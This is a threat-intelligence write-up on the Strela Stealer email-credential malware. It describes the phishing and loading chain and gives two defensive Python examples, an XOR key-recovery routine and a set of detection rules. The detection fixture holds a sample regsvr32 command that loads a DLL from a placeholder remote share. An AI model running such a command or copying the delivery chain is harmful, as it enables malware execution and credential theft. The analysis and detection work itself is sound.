Strela Stealer is an information-stealing malware family built to harvest email credentials, and its campaigns are aimed at specific European countries rather than opportunistic mass infection.
Active since late 2022, it targets two email clients specifically: Microsoft Outlook and Mozilla Thunderbird.
Strela Stealer has been distributed through large-scale phishing campaigns, primarily affecting users in Spain, Italy, Germany, and Ukraine.
Phishing Campaigns and Delivery Mechanism
The threat actor behind Strela Stealer, tracked as Hive0145, has evolved its tactics over time and relies on social engineering to get recipients to open the attachment.
Recent campaigns send invoice-themed emails that look legitimate, but instead of an invoice the attachment is a ZIP archive containing the malware loader.
When the recipient opens the archive and launches the file inside, a heavily obfuscated JScript file runs under Windows Script Host (wscript.exe or cscript.exe); the obfuscation is there to evade signature-based detection.
Before doing anything else, the script checks the system locale and only proceeds with deployment if it matches one of the targeted regions.
Technical Analysis and Obfuscation Techniques
Strela Stealer uses several layers of obfuscation, including control-flow flattening, which makes both static and dynamic analysis laborious.
If the locale check passes, the script connects to a public WebDAV share and loads a DLL from it through regsvr32, so the DLL is executed directly from the remote share rather than being written to disk first.
According to Trustwave's report, this DLL is padded with meaningless arithmetic operations and has no import table, which complicates static analysis.
In the final stage the payload is XOR-decrypted and its import address table is rebuilt at runtime. The malware also uses Windows fibers and fiber-local storage to hinder debugging.
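The XOR-decryption step above is a common one for analysts to undo by hand. The following is an added example, not Trustwave's analysis code and not Strela Stealer's actual routine: it recovers a repeating XOR key from an encrypted PE payload by known-plaintext, assuming the decrypted file is a standard PE that still carries the default DOS stub text at offset 0x4E, and it validates the candidate key by checking for the "PE\0\0" signature at e_lfanew. The sample buffer and the key "s7r3la" are constructed here for illustration.

```python
# Known-plaintext recovery of a repeating XOR key from an encrypted PE payload.
# Added example; the sample data and key are constructed, not taken from a real sample.

KNOWN_STUB = b"This program cannot be run in DOS mode."
STUB_OFFSET = 0x4E  # where the default linker DOS stub places this string
# (offset, plaintext) pairs we assume are present in the decrypted file
KNOWN_PLAINTEXT = ((0, b"MZ"), (STUB_OFFSET, KNOWN_STUB))


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; XOR is its own inverse, so this both encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def key_candidate(blob: bytes, klen: int):
    """Derive a key of length klen from the known plaintext, or None if inconsistent."""
    key = [None] * klen
    for off, plain in KNOWN_PLAINTEXT:
        for i, p in enumerate(plain):
            pos = off + i
            if pos >= len(blob):
                return None
            kb = blob[pos] ^ p
            slot = pos % klen
            if key[slot] is None:
                key[slot] = kb
            elif key[slot] != kb:
                return None  # same key slot would need two values: wrong length
    if any(k is None for k in key):
        return None  # known plaintext does not cover every key position
    return bytes(key)


def looks_like_pe(data: bytes) -> bool:
    """Cheap structural check: MZ header and PE signature at e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def recover_key(blob: bytes, max_len: int = 40):
    """Try key lengths from 1 upward and return the shortest key that yields a PE."""
    for klen in range(1, max_len + 1):
        key = key_candidate(blob, klen)
        if key is not None and looks_like_pe(xor_bytes(blob, key)):
            return key
    return None


def build_fake_pe() -> bytes:
    """Constructed stand-in for a PE header: MZ, e_lfanew=0x80, DOS stub text, PE signature."""
    buf = bytearray(0x100)
    buf[0:2] = b"MZ"
    buf[0x3C:0x40] = (0x80).to_bytes(4, "little")
    buf[STUB_OFFSET:STUB_OFFSET + len(KNOWN_STUB)] = KNOWN_STUB
    buf[0x80:0x84] = b"PE\0\0"
    return bytes(buf)


SAMPLE_KEY = b"s7r3la"  # hypothetical key used only to build the sample
ENCRYPTED_SAMPLE = xor_bytes(build_fake_pe(), SAMPLE_KEY)


if __name__ == "__main__":
    key = recover_key(ENCRYPTED_SAMPLE)
    print("recovered key:", key)
    print("valid PE after decryption:", looks_like_pe(xor_bytes(ENCRYPTED_SAMPLE, key)))
```

The validation step matters: a wrong key length can still produce a self-consistent candidate from a short stretch of known plaintext, and the PE-signature check is what rejects it. On a real sample the stub may be absent or customised, in which case the known-plaintext offsets have to be adjusted, and the rebuilt import table still has to be recovered separately from memory.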
Once activated, Strela Stealer searches for email client data, specifically targeting Mozilla Thunderbird and Microsoft Outlook profiles.
It encrypts the harvested login credentials and exfiltrates them to a command-and-control (C2) server hosted on Russian bulletproof hosting infrastructure.
It also collects system information and a list of installed applications and sends this data to the same C2 server.
The malware sets a unique User-Agent header derived from the system's volume GUID, which lets the operators tell compromised hosts apart and also gives defenders a per-host string to look for in proxy logs.
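The delivery chain described above (script host launched from a ZIP, regsvr32 pulling a DLL from a remote share) and the GUID-derived User-Agent each leave traces that can be matched in telemetry. The following is an added example of such detection logic, not code from Trustwave or any vendor product: it runs a few rules over constructed Sysmon-style process-creation events and over User-Agent strings. The sample events, the IP 203.0.113.10, the share path and the archive name are all made up, and the assumption that the User-Agent is a bare GUID is ours; the page only says it is derived from the volume GUID, not what it looks like on the wire.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1 style fields); not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" "C:\Users\ana\AppData\Local\Temp\Temp1_factura_2024.zip\factura_2024.js"'},
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32.exe /s \\203.0.113.10@80\share\x.dll'},   # hypothetical WebDAV path
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r'regsvr32.exe /s "C:\Program Files\Vendor\legit.dll"'},  # benign local DLL
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'wscript.exe C:\Scripts\logon.vbs'},                     # benign logon script
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
# Explorer's built-in ZIP handler extracts a double-clicked member to %TEMP%\Temp1_<archive>.zip\;
# third-party archivers use different temp folders, so this rule covers the Explorer case only.
ARCHIVE_TEMP_RE = re.compile(r'\\Temp\\Temp\d*_[^\\]+\.zip\\[^"]+\.jse?\b', re.I)
# UNC path (\\host\share or \\host@port\DavWWWRoot\...), URL, or explicit WebDAV root
REMOTE_DLL_RE = re.compile(r'(\\\\[^\s"]+|https?://\S+|DavWWWRoot)', re.I)
GUID_RE = re.compile(r"\{?[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}\}?", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list:
    """Return the names of all rules the event matches (empty list if none)."""
    hits = []
    image, parent, cmd = basename(event["image"]), basename(event["parent"]), event["cmdline"]
    if image in SCRIPT_HOSTS and ARCHIVE_TEMP_RE.search(cmd):
        hits.append("wsh_script_from_zip_temp")
    if image == "regsvr32.exe" and REMOTE_DLL_RE.search(cmd):
        hits.append("regsvr32_remote_dll")
        if parent in SCRIPT_HOSTS:
            hits.append("regsvr32_spawned_by_script_host")
    return hits


def scan(events: list) -> dict:
    """Map event index to matched rule names, for events that matched at least one rule."""
    return {i: hits for i, ev in enumerate(events) if (hits := classify(ev))}


def suspicious_user_agent(ua: str) -> bool:
    """Flag a User-Agent that is nothing but a GUID.
    Assumption for this example: the GUID-derived UA is sent as a bare GUID."""
    return GUID_RE.fullmatch(ua.strip()) is not None


if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(rules)}")
    for ua in ("{6f9619ff-8b86-d011-b42d-00c04fc964ff}", "Mozilla/5.0 (Windows NT 10.0)"):
        print(f"{ua!r}: {'suspicious' if suspicious_user_agent(ua) else 'ok'}")
```

Two points on the design: the regsvr32 rule matches on the argument shape rather than on a specific host, so it survives infrastructure changes, and the parent-child rule (script host spawning regsvr32) is the strongest single signal because legitimate scripts rarely do that. Expect the script-from-ZIP rule to need tuning for archivers other than Explorer, and treat the User-Agent rule as a hunting query rather than an alert until the real format has been confirmed from a sample.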
The C2 infrastructure is linked to the Proton66 OOO autonomous system, known for its involvement in various malware campaigns.
Strela Stealer's narrow targeting and heavy obfuscation show how focused these campaigns have become. Defending against them means treating the chain the malware depends on, invoice-themed archive attachments, script-host execution from temporary folders, and regsvr32 loading DLLs from remote shares, as events worth blocking or at least alerting on.